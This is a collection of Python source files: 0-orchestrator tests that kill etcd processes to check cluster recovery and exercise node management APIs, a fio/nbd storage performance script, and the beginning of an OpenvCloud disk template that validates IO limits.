node_client = self.Client(self.nodes_with_etcd[i]["ip"], password=self.jwt)
response = node_client.client.bash("ps xu | grep [e]tcd | awk '{ print $1 }'").get()
self.assertEqual(response.state, "SUCCESS")
response = node_client.client.bash(" kill -9 %s"%response.stdout).get()
self.assertEqual(response.state, "SUCCESS")
self.lg.info(" Check that etcd process return back in this nodes, should succeed. ")
for i in range(tolerance):
for _ in range(5):
time.sleep(5)
node_client = self.Client(self.nodes_with_etcd[i]["ip"], password=self.jwt)
response = node_client.client.bash("ps xu | grep [e]tcd | awk '{ print $1 }'").get()
if response.stdout == " ":
continue
break
else:
self.assertTrue(False, "etcd_cluster doesn't work again for node %s"%self.nodes_with_etcd[i]["id"])
self.lg.info("Create (VM0),should succeed.")
self.response, self.data = self.vms_api.post_nodes_vms(node_id=self.nodeid, disks=self.disks)
self.assertEqual(self.response.status_code, 201)
self.lg.info("Get (VM0) details ,(VM0) status should be running.")
for _ in range(20):
response = self.vms_api.get_nodes_vms_vmid(self.nodeid, self.data['id'])
self.assertEqual(response.status_code, 200)
status = response.json()['status']
if status == 'running':
break
else:
time.sleep(3)
else:
self.assertEqual(response.json()['status'], 'running', " [*] can't start vm.")
@unittest.skip("https://github.com/zero-os/0-orchestrator/issues/1196")
def test002_kill_etcdcluster_more_than_tolerance(self):
""" GAT-151
**Test Scenario:**
#. Check that etcd process run in all nodes if number of nodes odd.
#. Check that etcd process run in (n-1) nodes if number of nodes even.
#. kill etcd process in more than (n-1)/2 nodes ,should succeed.
#. Check that etcd process recovered in same numbers of nodes before killing etcd.
#. Create (VM0),should succeed.
#. Get (VM0) details ,(VM0) status should be running.
"""
self.lg.info(" Kill etcd process in more than (n-1)/2 nodes")
tolerance = int((len(self.nodes_with_etcd)-1)/2)
for i in range(tolerance+1):
node_client = self.Client(self.nodes_with_etcd[i]["ip"], password=self.jwt)
response = node_client.client.bash("ps xu | grep [e]tcd | awk '{ print $1 }'").get()
self.assertEqual(response.state, "SUCCESS")
response = node_client.client.bash(" kill -9 %s"%response.stdout).get()
self.assertEqual(response.state, "SUCCESS")
self.lg.info(" Check that etcd process recovered in same numbers of nodes before killing etcd")
recoverd_etcd = []
for i in range(self.number_of_nodes):
node_client = self.Client(self.nodes_info[i]["ip"], password=self.jwt)
for _ in range(5):
time.sleep(5)
response = node_client.client.bash("ps xu | grep [e]tcd | grep [r]ecovered ").get()
if "recovered" not in response.stdout:
continue
recoverd_etcd.append(self.nodes_info[i])
break
if (len(recoverd_etcd) == len(self.nodes_with_etcd)):
break
else:
self.assertEqual(len(recoverd_etcd), len(self.nodes_with_etcd))
self.lg.info("Create (VM0),should succeed.")
self.response, self.data = self.vms_api.post_nodes_vms(node_id=self.nodeid, memory=1024, cpu=1, disks=self.disks)
self.assertEqual(self.response.status_code, 201)
self.lg.info("Get (VM0) details ,(VM0) status should be running.")
for _ in range(20):
response = self.vms_api.get_nodes_vms_vmid(self.nodeid, self.data['id'])
self.assertEqual(response.status_code, 200)
status = response.json()['status']
if status == 'running':
break
else:
time.sleep(3)
else:
self.assertEqual(response.json()['status'], 'running', " [*] can't start vm.")
```
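Both tests rely on standard etcd quorum math: a cluster of k members stays writable while at most floor((k-1)/2) members are down. A quick illustration of the tolerance values used above:

```python
# Failure tolerance of an etcd cluster with k members (majority quorum).
for k in (3, 4, 5, 7):
    print(k, 'members tolerate', (k - 1) // 2, 'failures')
# -> 3 tolerates 1, 4 tolerates 1, 5 tolerates 2, 7 tolerates 3.
```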
#### File: testcases/basic_tests/test01_nodeid_apis.py
```python
import random
from testcases.testcases_base import TestcasesBase
import unittest
class TestNodeidAPI(TestcasesBase):
def test001_list_nodes(self):
""" GAT-001
*GET:/node/ Expected: List of all nodes*
**Test Scenario:**
#. Send get nodes api request.
#. Compare results with golden value.
"""
self.lg.info('send get nodes api request ')
response = self.nodes_api.get_nodes()
self.assertEqual(response.status_code, 200)
self.lg.info('Compare results with golden value.')
Running_nodes = []
Nodes_result = response.json()
for node in Nodes_result:
if node['status'] == 'running':
Running_nodes.append(node)
self.assertEqual(len(Running_nodes), len(self.nodes_info))
for node in Running_nodes:
node_info = [item for item in self.nodes_info if item["id"] == node["id"]]
self.assertEqual(len(node_info), 1)
for key in node.keys():
if key in node_info[0].keys():
self.assertEqual(node[key], node_info[0][key])
def test002_get_nodes_details(self):
""" GAT-002
*GET:/nodes/{nodeid} - Expected: id, status, hostname*
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Send get nodes/{nodeid} api request.
#. Compare results with golden value.
"""
self.lg.info(' Send get nodes/{nodeid} api request.')
response = self.nodes_api.get_nodes_nodeid(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('Compare results with golden value.')
node_details = response.json()
node_info = [x for x in self.nodes_info if x["id"] == self.nodeid][0]
for key in node_info.keys():
if key in node_details.keys():
self.assertEqual(node_info[key], node_details[key])
def test003_list_jobs(self):
""" GAT-003
*GET:/nodes/{nodeid}/jobs - Expected: job list items*
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Send get /nodes/{nodeid}/jobs api request.
#. Compare results with golden value.
"""
self.lg.info('Send get /nodes/{nodeid}/jobs api request.')
response = self.nodes_api.get_nodes_nodeid_jobs(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('Compare results with golden value.')
jobs = response.json()
client_jobs = self.core0_client.get_jobs_list()
self.assertEqual(len(jobs), len(client_jobs))
for job in jobs:
for client_job in client_jobs:
if job['id'] == client_job['id']:
self.assertEqual(job['startTime'], client_job['starttime'])
break
def test004_kill_jobs(self):
""" GAT-004
*DELETE:/nodes/{nodeid}/jobs *
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Send get /nodes/{nodeid}/jobs api request.
#. Check that all jobs have been killed.
"""
self.lg.info(' Send get /nodes/{nodeid}/jobs api request.')
response = self.nodes_api.delete_nodes_nodeid_jobs(node_id=self.nodeid)
self.assertEqual(response.status_code, 204)
self.lg.info('Check that all jobs has been killed.')
response = self.nodes_api.get_nodes_nodeid_jobs(node_id=self.nodeid)
jobs_list = response.json()
self.assertGreater(len(jobs_list), 5)
def test005_get_job_details(self):
""" GAT-005
*GET:/nodes/{nodeid}/jobs/{jobid} *
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Get list of jobs of this node .
#. Choose one of these jobs to list its details.
#. Send get /nodes/{nodeid}/jobs/{jobid} api request.
#. Compare response with the golden values.
"""
self.lg.info('Get list of jobs of this node .')
response = self.nodes_api.get_nodes_nodeid_jobs(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('Choose one of these jobs to list its details.')
jobs_list = response.json()
job_id = jobs_list[random.randint(0, (len(jobs_list) - 1))]['id']
self.lg.info('Send get /nodes/{nodeid}/jobs/{jobid} api request.')
response = self.nodes_api.get_nodes_nodeid_jobs_jobid(node_id=self.nodeid, job_id=job_id)
self.assertEqual(response.status_code, 200)
self.lg.info('Compare response with the golden values.')
job_details = response.json()
client_jobs = self.core0_client.get_jobs_list()
for client_job in client_jobs:
if client_job['id'] == job_id:
for key in job_details.keys():
if key in client_job.keys():
self.assertEqual(job_details[key], client_job[key])
break
def test006_kill_specific_job(self):
""" GAT-006
*DELETE:/nodes/{nodeid}/jobs/{jobid} *
**Test Scenario:**
#. Start new job .
#. delete /nodes/{nodeid}/jobs/{jobid} api.
#. verify this job has been killed.
"""
self.lg.info('start new job ')
job_id = self.core0_client.start_job()
self.assertTrue(job_id)
self.lg.info(' delete /nodes/{nodeid}/jobs/{jobid} api.')
response = self.nodes_api.delete_nodes_nodeid_jobs_jobid(node_id=self.nodeid, job_id=job_id)
self.assertEqual(response.status_code, 204)
self.lg.info("verify this job has been killed.")
jobs = self.core0_client.get_jobs_list()
self.assertFalse(any(job['id'] == job_id for job in jobs))
def test007_ping_specific_node(self):
""" GAT-007
*POST:/nodes/{nodeid}/ping *
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Post /nodes/{nodeid}/ping api.
#. Check response status code.
"""
self.lg.info('post /nodes/{nodeid}/ping api.')
response = self.nodes_api.post_nodes_nodeid_ping(node_id=self.nodeid)
self.lg.info('check response status code.')
self.assertEqual(response.status_code, 200)
def test008_get_node_state(self):
""" GAT-008
*GET:/nodes/{nodeid}/state *
**Test Scenario:**
#. Choose one random node of list of running nodes.
#. Get /nodes/{nodeid}/state api.
#. Compare response data with the golden values.
"""
self.lg.info(' get /nodes/{nodeid}/state api.')
response = self.nodes_api.get_nodes_nodeid_state(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('Compare response data with the golden values.')
client_state = self.core0_client.get_node_state()
node_state = response.json()
for key in node_state.keys():
if key in client_state.keys():
self.assertAlmostEqual(node_state[key],
client_state[key],
delta=6000000, msg='different value for key%s' % key)
def test010_get_cpus_details(self):
""" GAT-010
*GET:/nodes/{nodeid}/cpus *
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. get /nodes/{nodeid}/cpus api.
#. compare response data with the golden values.
"""
self.lg.info('get /nodes/{nodeid}/cpus api.')
response = self.nodes_api.get_nodes_nodeid_cpus(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('compare response data with the golden values.')
result = self.core0_client.get_nodes_cpus()
cpus_info = response.json()
for i, cpu_info in enumerate(cpus_info):
for key in cpu_info.keys():
if key in result[i].keys():
if key != 'cores' and key != 'mhz':
self.assertEqual(cpu_info[key], result[i][key], "different cpu info for key %s" % key)
def test011_get_disks_details(self):
""" GAT-011
*GET:/nodes/{nodeid}/disks *
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. Get /nodes/{nodeid}/disks api.
#. Compare response data with the golden values.
"""
self.lg.info('get /nodes/{nodeid}/disks api.')
response = self.nodes_api.get_nodes_nodeid_disks(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
disks_info = response.json()
self.lg.info('compare response data with the golden values.')
result = self.core0_client.get_nodes_disks()
self.assertEqual(result, disks_info)
def test012_get_memmory_details(self):
""" GAT-012
*GET:/nodes/{nodeid}/mem *
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. get /nodes/{nodeid}/mem api.
#. compare response data with the golden values.
"""
self.lg.info('get /nodes/{nodeid}/mem api.')
response = self.nodes_api.get_nodes_nodeid_mem(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('compare response data with the golden values.')
result = self.core0_client.get_nodes_mem()
memory_info = response.json()
for key in memory_info.keys():
if key in result.keys():
self.assertAlmostEqual(memory_info[key], result[key],
msg="different keys%s" % key,
delta=10000000)
def test013_get_nics_details(self):
""" GAT-013
*GET:/nodes/{nodeid}/nics - network interface information*
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. Get /nodes/{nodeid}/nics api.
#. compare response data with the golden values.
"""
self.lg.info('get /nodes/{nodeid}/nics api.')
response = self.nodes_api.get_nodes_nodeid_nics(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('compare response data with the golden values.')
golden_result = self.core0_client.get_nodes_nics()
nics_info = response.json()
self.assertEqual(len(nics_info), len(golden_result))
for nic_info in nics_info:
for nic_result in golden_result:
if nic_result['name'] == nic_info['name']:
for key in nic_info.keys():
if key in nic_result.keys():
self.assertEqual(nic_info[key], nic_result[key],
'different value for key %s' % key)
break
def test014_get_os_info_details(self):
""" GAT-014
*GET:/nodes/{nodeid}/info - os information*
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. Get /nodes/{nodeid}/info api.
#. Compare response data with the golden values.
"""
self.lg.info('Get /nodes/{nodeid}/info api.')
response = self.nodes_api.get_nodes_nodeid_info(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('compare response data with the golden values.')
result = self.core0_client.get_nodes_info()
node_info = response.json()
for key in node_info.keys():
if key in result.keys():
self.assertEqual(node_info[key], result[key])
def test015_list_processes(self):
""" GAT-015
*GET:/nodes/{nodeid}/process *
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. get /nodes/{nodeid}/processes api.
#. compare response data with the golden values.
"""
self.lg.info('Get /nodes/{nodeid}/process api.')
response = self.nodes_api.get_nodes_nodeid_processes(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
self.lg.info('compare response data with the golden values.')
processes = {}
client_processes = {}
client_result = self.core0_client.get_processes_list()
for process in client_result:
client_processes[process['pid']] = process
for process in response.json():
processes[process['pid']] = process
skip_keys = ['<KEY>']
for process_id in processes.keys():
process_info = processes[process_id]
for info in process_info.keys():
if info not in skip_keys:
if info in client_processes[process_id].keys():
self.assertEqual(process_info[info],
client_processes[process_id][info],
"different value with key%s" % info)
def test016_get_process_details(self):
""" GAT-016
*GET:/nodes/{nodeid}/processes/{processid} *
**Test Scenario:**
#. Choose one random node from list of running nodes.
#. Get list of running processes
#. choose one of them.
#. Get /nodes/{nodeid}/processes/{processid} api.
#. compare response data with the golden values.
"""
self.lg.info('Get list of running processes')
response = self.nodes_api.get_nodes_nodeid_processes(node_id=self.nodeid)
self.assertEqual(response.status_code, 200)
processes_list = response.json()
self.lg.info('Choose one of these processes to list its details.')
process_id = processes_list[random.randint(0, len(processes_list) - 1)]['pid']
self.lg.info('Get /nodes/{nodeid}/process/{processid} api.')
response = self.nodes_api.get_nodes_nodeid_processes_processid(node_id=self.nodeid, process_id=str(process_id))
self.assertEqual(response.status_code, 200)
self.lg.info('Compare response data with the golden values.')
process_info = response.json()
client_result = self.core0_client.get_processes_list()
for process in client_result:
if process['pid'] == process_info['pid']:
for info in process_info.keys():
if info != 'cpu':
if info in process.keys():
self.assertEqual(process_info[info], process[info],
"different value with key%s" % info)
break
def test017_delete_process(self):
""" GAT-017
*DELETE:/nodes/{nodeid}/processes/{processid} *
**Test Scenario:**
#. Start new process.
#. Delete /nodes/{nodeid}/processes/{processid} api.
#. Make sure that this process has been killed.
"""
self.lg.info('Start new process.')
process_id = self.core0_client.start_process()
self.assertTrue(process_id)
self.lg.info('delete /nodes/{nodeid}/processes/{processid} api.')
response = self.nodes_api.delete_nodes_nodeid_process_processid(node_id=self.nodeid,
process_id=str(process_id))
self.assertEqual(response.status_code, 204)
self.lg.info('Make sure that this process has been killed.')
client_processes = self.core0_client.get_processes_list()
self.assertFalse(any(process['pid'] == process_id for process in client_processes))
```
#### File: tests/performance/bd-performance.py
```python
import os
import json
import click
import logging
import time
import yaml
from io import BytesIO
from zeroos.core0.client import Client as Client0
from zeroos.orchestrator import client as apiclient
os.environ['LC_ALL'] = 'C.UTF-8'
os.environ['LANG'] = 'C.UTF-8'
logging.basicConfig(level=logging.INFO)
@click.command()
@click.option('--orchestratorserver', required=True, help='0-orchestrator api server endpoint. Eg http://192.168.193.212:8080')
@click.option('--jwt', required=True, help='jwt')
@click.option('--storagecluster', required=True, help='Name of the storage cluster in which the vdisks need to be created')
@click.option('--vdiskCount', required=True, type=int, help='Number of vdisks that need to be created')
@click.option('--vdiskSize', required=True, type=int, help='Size of disks in GB')
@click.option('--runtime', required=True, type=int, help='Time fio should be run')
@click.option('--vdiskType', required=True, type=click.Choice(['boot', 'db', 'cache', 'tmp']), help='Type of disk')
@click.option('--resultDir', required=True, help='Results directory path')
@click.option('--nodeLimit', type=int, help='Limit the number of nodes')
def test_fio_nbd(orchestratorserver, jwt, storagecluster, vdiskcount, vdisksize, runtime, vdisktype, resultdir, nodelimit):
"""Creates a storagecluster on all the nodes in the resourcepool"""
api = apiclient.APIClient(orchestratorserver)
api.set_auth_header("Bearer %s" % jwt)
logging.info("Discovering nodes in the cluster ...")
nodes = api.nodes.ListNodes().json()
nodes = [node for node in nodes if node["status"] == "running"]
nodelimit = nodelimit if nodelimit is None or nodelimit <= len(nodes) else len(nodes)
if nodelimit is not None:
if vdiskcount < nodelimit:
raise ValueError("Vdisk count should be at least the same as number of nodes")
elif vdiskcount < len(nodes):
raise ValueError("Vdisk count should be at least the same as number of nodes")
vdiskcount = int(vdiskcount / len(nodes)) if nodelimit is None else int(vdiskcount / nodelimit)
logging.info("Found %s ready nodes..." % (len(nodes)))
nodeIDs = [node['id'] for node in nodes]
nodeIPs = [node['ipaddress'] for node in nodes]
if nodelimit:
nodeIDs = nodeIDs[:nodelimit]
nodeIPs = nodeIPs[:nodelimit]
deployInfo = {}
try:
deployInfo, vdisks = deploy(api, nodeIDs, nodeIPs, orchestratorserver, storagecluster, vdiskcount, vdisksize, vdisktype, jwt)
mountVdisks(deployInfo, nodeIDs, nodeIPs, jwt)
cycle = 0
while runtime:
if runtime < 3600:
cycle_time = runtime
runtime = 0
else:
cycle_time = 3600
runtime -= 3600
cycle += 1
cycle_dir = os.path.join(resultdir, str(cycle))
os.makedirs(cycle_dir, exist_ok=True)
test(deployInfo, nodeIDs, cycle_time, nodeIPs, jwt)
waitForData(nodeIDs, deployInfo, cycle_time, cycle_dir, nodeIPs, jwt)
except Exception as e:
raise RuntimeError(e)
finally:
cleanUp(nodeIPs, nodeIDs, deployInfo, jwt, vdisks)
def StartContainerJob(api, **kwargs):
res = api.nodes.StartContainerJob(**kwargs)
return res.headers["Location"].split("/")[-1]
def waitForData(nodeIDs, deployInfo, runtime, resultdir, nodeIPs, jwt):
os.makedirs(resultdir, exist_ok=True)
for idx, nodeID in enumerate(nodeIDs):
nodeClient = Client0(nodeIPs[idx], password=jwt)
start = time.time()
while start + (runtime + 120) > time.time():
try:
testcontainerId = deployInfo[nodeID]["testContainer"]
containerclient = nodeClient.container.client(testcontainerId)
filepath = '/%s.test.json' % nodeID
buff = BytesIO()
containerclient.filesystem.download(filepath, buff)
except:
time.sleep(1)
else:
if buff.getvalue() == b'':
time.sleep(5)
continue
file = '%s/%s.test.json' % (resultdir, nodeID)
logging.info("Saving test data in %s ..." % file)
with open(file, 'wb') as outfile:
outfile.write(buff.getvalue())
break
def mountVdisks(deployInfo, nodeIDs, nodeIPs, jwt):
for idx, nodeID in enumerate(nodeIDs):
nodeClient = Client0(nodeIPs[idx], password=jwt)
testcontainerId = deployInfo[nodeID]["testContainer"]
nbdConfig = deployInfo[nodeID]["nbdConfig"]
deployInfo[nodeID]["nbdClientInfo"] = nbdClientConnect(nodeClient, nodeID, testcontainerId, nbdConfig)
def test(deployInfo, nodeIDs, runtime, nodeIPs,jwt ):
for idx, nodeID in enumerate(nodeIDs):
nodeClient = Client0(nodeIPs[idx], password=jwt)
testcontainerId = deployInfo[nodeID]["testContainer"]
clientInfo = deployInfo[nodeID]["nbdClientInfo"]
filenames = clientInfo["filenames"]
client_pids = clientInfo["client_pids"]
deployInfo[nodeID]["filenames"] = filenames
deployInfo[nodeID]["clientPids"] = client_pids
fioCommand = ' /bin/fio \
--iodepth 16\
--ioengine libaio\
--size 100000000000M\
--readwrite randrw \
--rwmixwrite 20 \
--filename {filenames} \
--runtime {runtime} \
--output {nodeID}.test.json\
--numjobs {length} \
--name test1 \
--group_reporting \
--output-format=json \
--direct 1 \
'.format(filenames=filenames, runtime=runtime, nodeID=nodeID, length=len(filenames.split(":")) * 2)
containerclient = nodeClient.container.client(testcontainerId)
containerclient.system(fioCommand)
def cleanUp(nodeIPs, nodeIDs, deployInfo, jwt, vdisks):
logging.info("Cleaning up...")
for idx, nodeID in enumerate(nodeIDs):
nodeClient = Client0(nodeIPs[idx], password=jwt)
if deployInfo.get(nodeID, None):
nbdConfig = deployInfo[nodeID]["nbdConfig"]
nbdContainerId = deployInfo[nodeID]["nbdContainer"]
nbdcontainerclient = nodeClient.container.client(nbdContainerId)
testContainerId = deployInfo[nodeID]["testContainer"]
testContainerclient = nodeClient.container.client(testContainerId)
filenames = deployInfo[nodeID]["filenames"]
client_pids = deployInfo[nodeID]["clientPids"]
# Disconnecting nbd disks
for idx, filename in enumerate(filenames.split(":")):
disconnectDiskCommand = '/bin/nbd-client \
-d {filename} \
'.format(filename=filename)
job = testContainerclient.bash(disconnectDiskCommand)
job.get()
if job.exists:
testContainerclient.job.kill(client_pids[idx])
deleteDiskCommand = '/bin/zeroctl \
delete \
vdisks \
{vdisks}\
--config {configpath} \
'.format(vdisks=','.join(vdisks[nodeID]), configpath=nbdConfig["configpath"])
response = nbdcontainerclient.system(deleteDiskCommand).get()
if response.state != "SUCCESS":
raise RuntimeError("Command %s failed to execute successfully. %s" % (deleteDiskCommand, response.stderr))
nodeClient.container.terminate(testContainerId)
nodeClient.container.terminate(nbdContainerId)
def deploy(api, nodeIDs, nodeIPs, orchestratorserver, storagecluster, vdiskcount, vdisksize, vdisktype, jwt):
deployInfo = {}
storageclusterInfo = getStorageClusterInfo(api, storagecluster)
vdisks = {}
for idx, nodeID in enumerate(nodeIDs):
# Create filesystem to be shared amongst fio and nbd server containers
fss = _create_fss(orchestratorserver, api, nodeID)
# Create block device container and start nbd
nbdContainer = "nbd_{}".format(str(time.time()).replace('.', ''))
nbdFlist = "https://hub.gig.tech/gig-official-apps/0-disk-master.flist"
nodeClient = Client0(nodeIPs[idx], password=jwt)
nbdcontainerId = createContainer(nodeClient, orchestratorserver, api, nodeID, fss, nbdFlist, nbdContainer)
containerclient = nodeClient.container.client(nbdcontainerId)
nbdConfig, vdiskIds= startNbd(containerclient=containerclient,
nodeID=nodeID,
storagecluster=storagecluster,
fs=fss,
containername=nbdContainer,
vdiskCount=vdiskcount,
vdiskSize=vdisksize,
vdiskType=vdisktype,
storageclusterInfo=storageclusterInfo)
vdisks[nodeID] = vdiskIds
# Create and setup the test container
testContainer = "bptest_{}".format(str(time.time()).replace('.', ''))
fioFlist = "https://hub.gig.tech/gig-official-apps/performance-test.flist"
testcontainerId = createContainer(nodeClient, orchestratorserver, api, nodeID, fss, fioFlist, testContainer)
# Load nbd kernel module
response = nodeClient.system("modprobe nbd nbds_max=512").get()
if response.state != "SUCCESS":
raise ValueError("can't load nbd in node %s" % (nodeID))
deployInfo[nodeID] = {
"nbdContainer": nbdcontainerId,
"testContainer": testcontainerId,
"nbdConfig": nbdConfig,
}
return deployInfo, vdisks
def getStorageClusterInfo(api, storagecluster):
logging.info("Getting storagecluster info...")
storageclusterInfo = api.storageclusters.GetClusterInfo(storagecluster).json()
datastorages = []
metadatastorage = ''
clusterconfig = {
'dataStorage': [],
}
for storage in storageclusterInfo.get('dataStorage', []):
datastorages.append("%s:%s" % (storage['ip'], storage['port']))
clusterconfig['dataStorage'].append({"address": "%s:%s" % (storage['ip'], storage['port'])})
for storage in storageclusterInfo.get('metadataStorage', []):
metadatastorage = "%s:%s" % (storage['ip'], storage['port'])
clusterconfig['metadataStorage'] = {"address": "%s:%s" % (storage['ip'], storage['port'])}
return {
"clusterconfig": clusterconfig,
"datastorage": datastorages,
"metadatastorage": metadatastorage,
}
def startNbd(containerclient, nodeID, storagecluster, fs, containername, vdiskCount, vdiskSize, vdiskType, storageclusterInfo):
# Start nbd servers
fs = fs.replace(':', os.sep)
socketpath = '/fs/{}/server.socket.{}'.format(fs, containername)
configpath = "/{}.config".format(containername)
config = {
'storageClusters': {storagecluster: storageclusterInfo["clusterconfig"]},
'vdisks': {},
}
vdiskIDs = []
for i in range(vdiskCount):
# Run nbd
vdiskID = "testvdisk_{}".format(str(time.time()).replace('.', ''))
vdiskIDs.append(vdiskID)
vdiskconfig = {
'blockSize': 4096,
'readOnly': False,
'size': vdiskSize,
'nbd': {"storageClusterID": storagecluster},
'type': vdiskType
}
config['vdisks'][vdiskID] = vdiskconfig
yamlconfig = yaml.safe_dump(config, default_flow_style=False)
yamlconfig = yamlconfig.encode("utf8")
###
bytes = BytesIO(yamlconfig)
containerclient.filesystem.upload(configpath, bytes)
nbdCommand = '/bin/nbdserver \
-protocol unix \
-address "{socketpath}" \
-config "{configpath}" \
'.format(socketpath=socketpath, configpath=configpath)
nbdjob = containerclient.system(nbdCommand)
jobId = nbdjob.id
logging.info("Starting nbdserver on node: %s", nodeID)
nbdConfig = {
"socketpath": socketpath,
"datastorage": storageclusterInfo["datastorage"],
"metadatastorage": storageclusterInfo["metadatastorage"],
"pid": jobId,
"vdisks": vdiskIDs,
"configpath": configpath,
}
logging.info("Waiting for 10 seconds to evaluate nbdserver processes")
time.sleep(10)
if not nbdjob.running:
raise ValueError("nbd server on node %s is not in a valid state" % (nodeID))
return nbdConfig, vdiskIDs
def createContainer(nodeClient, orchestratorserver, cl, nodeID, fs, flist, hostname):
logging.info(
"Creating new container %s" % (hostname))
fss = "/fs/{}".format(fs.replace(':', os.sep))
mntdir = "/mnt/storagepools/{}/filesystems/{}".format(fs[:fs.find(':')], fs[fs.find(':')+1:])
mount = {mntdir: fss}
containerId = nodeClient.container.create(root_url=flist,
host_network=True,
mount=mount,
nics=[],
port=None,
hostname=hostname,
privileged=True,
name=hostname
).get()
if not containerId:
raise ValueError("can't create container %s" % (hostname))
return containerId
def nbdClientConnect(nodeClient, nodeID, testcontainerId, nbdConfig):
containerclient = nodeClient.container.client(testcontainerId)
filenames = ''
client_pids = []
for idx, val in enumerate(nbdConfig["vdisks"]):
nbdDisk = '/dev/nbd%s' % idx
nbdClientCommand = '/bin/nbd-client \
-N {val} \
-u {nbdConfig} \
{nbdDisk} \
-b 4096 \
'.format(val=val, nbdConfig=nbdConfig['socketpath'], nbdDisk=nbdDisk)
response = containerclient.system(nbdClientCommand).get()
if response.state != "SUCCESS":
raise RuntimeError("Command %s failed to execute successfully. %s" % (nbdClientCommand, response.stderr))
filenames = nbdDisk if filenames == '' else '%s:%s' % (filenames, nbdDisk)
client_pids.append(response.id)
return {"filenames": filenames, "client_pids": client_pids}
def _create_fss(orchestratorserver, cl, nodeID):
pool = "{}_fscache".format(nodeID)
fs_id = "fs_{}".format(str(time.time()).replace('.', ''))
fs = apiclient.FilesystemCreate.create(name=fs_id,
quota=0,
readOnly=False)
req = json.dumps(fs.as_dict(), indent=4)
link = "POST /nodes/{nodeid}/storagepools/{pool}/filesystems".format(nodeid=nodeID, pool=pool)
logging.info("Sending the following request to the /filesystem api:\n{}\n\n{}".format(link, req))
res = cl.nodes.CreateFilesystem(nodeid=nodeID, storagepoolname=pool, data=fs)
logging.info(
"Creating new filesystem...\n You can follow here: %s%s" % (orchestratorserver, res.headers['Location']))
return "{}:{}".format(pool, fs_id)
if __name__ == "__main__":
test_fio_nbd()
``` |
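The `test_fio_nbd` driver above slices the requested `--runtime` into hour-long fio cycles (a final shorter cycle absorbs the remainder) and stores each cycle's results in its own numbered directory. Below is a minimal standalone sketch of just that slicing logic, using an illustrative 5400-second runtime.

```python
# Sketch of the cycle-splitting loop from test_fio_nbd (values are illustrative).
def split_runtime(runtime, cycle_limit=3600):
    cycles = []
    while runtime:
        if runtime < cycle_limit:
            cycle_time = runtime
            runtime = 0
        else:
            cycle_time = cycle_limit
            runtime -= cycle_limit
        cycles.append(cycle_time)
    return cycles

print(split_runtime(5400))  # [3600, 1800] -> two fio cycles, results saved in ./1 and ./2
```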
{
"source": "5l1v3r1/0-templates",
"score": 2
} |
#### File: templates/disk/disk.py
```python
from js9 import j
from zerorobot.template.base import TemplateBase
from zerorobot.template.state import StateCheckError
class Disk(TemplateBase):
version = '0.0.1'
template_name = "disk"
OVC_TEMPLATE = 'github.com/openvcloud/0-templates/openvcloud/0.0.1'
ACCOUNT_TEMPLATE = 'github.com/openvcloud/0-templates/account/0.0.1'
VDC_TEMPLATE = 'github.com/openvcloud/0-templates/vdc/0.0.1'
def __init__(self, name, guid=None, data=None):
super().__init__(name=name, guid=guid, data=data)
self._ovc = None
self._account = None
self._config = None
self._space = None
def validate(self):
"""
Validate service data received during creation
"""
if not self.data['vdc']:
raise ValueError('vdc service name is required')
if not self.data['diskId'] and not self.data['name']:
raise ValueError('provide name to create a new device')
# ensure that disk has a valid type
if self.data['type'].upper() not in ["D", "B"]:
raise ValueError("disk type must be data D or boot B only")
self._validate_limits()
def _validate_limits(self):
"""
Validate limits on the Disk
"""
data = self.data
# ensure that limits are given correctly
if (data['maxIops'] or data['totalIopsSec']) and (data['readIopsSec'] or data['writeIopsSec']):
raise RuntimeError("total and read/write of iops_sec cannot be set at the same time")
if data['totalBytesSec'] and (data['readBytesSec'] or data['writeBytesSec']):
raise RuntimeError("total and read/write of bytes_sec cannot be set at the same time")
if data['totalBytesSecMax'] and (data['readBytesSecMax'] or data['writeBytesSecMax']):
raise RuntimeError("total and read/write of bytes_sec_max cannot be set at the same time")
if data['totalIopsSecMax'] and (data['readIopsSecMax'] or data['writeIopsSecMax']):
raise RuntimeError("total and read/write of iops_sec_max cannot be set at the same time")
def update(self, maxIops=None, totalBytesSec=None, readBytesSec=None,
writeBytesSec=None, totalIopsSec=None, readIopsSec=None,
writeIopsSec=None, totalBytesSecMax=None, readBytesSecMax=None,
writeBytesSecMax=None, totalIopsSecMax=None, readIopsSecMax=None,
writeIopsSecMax=None, sizeIopsSec=None):
""" Update limits
Interpretation of argument values:
:value 0: unset limit
:value None: parameter was not provided in the action data and limit will not be updated
:other values: update of the limit
"""
self.state.check('actions', 'install', 'ok')
updated = []
updated.append(self._update_value('maxIops', maxIops))
updated.append(self._update_value('totalBytesSec', totalBytesSec))
updated.append(self._update_value('readBytesSec', readBytesSec))
updated.append(self._update_value('writeBytesSec', writeBytesSec))
updated.append(self._update_value('totalIopsSec', totalIopsSec))
updated.append(self._update_value('readIopsSec', readIopsSec))
updated.append(self._update_value('writeIopsSec', writeIopsSec))
updated.append(self._update_value('totalBytesSecMax', totalBytesSecMax))
updated.append(self._update_value('readBytesSecMax', readBytesSecMax))
updated.append(self._update_value('writeBytesSecMax', writeBytesSecMax))
updated.append(self._update_value('totalIopsSecMax', totalIopsSecMax))
updated.append(self._update_value('readIopsSecMax', readIopsSecMax))
updated.append(self._update_value('writeIopsSecMax', writeIopsSecMax))
updated.append(self._update_value('sizeIopsSec', sizeIopsSec))
if any(updated):
# check that new limits are valid
self._validate_limits()
# apply new limits
self._limit_io()
def _update_value(self, arg, value):
if value is not None:
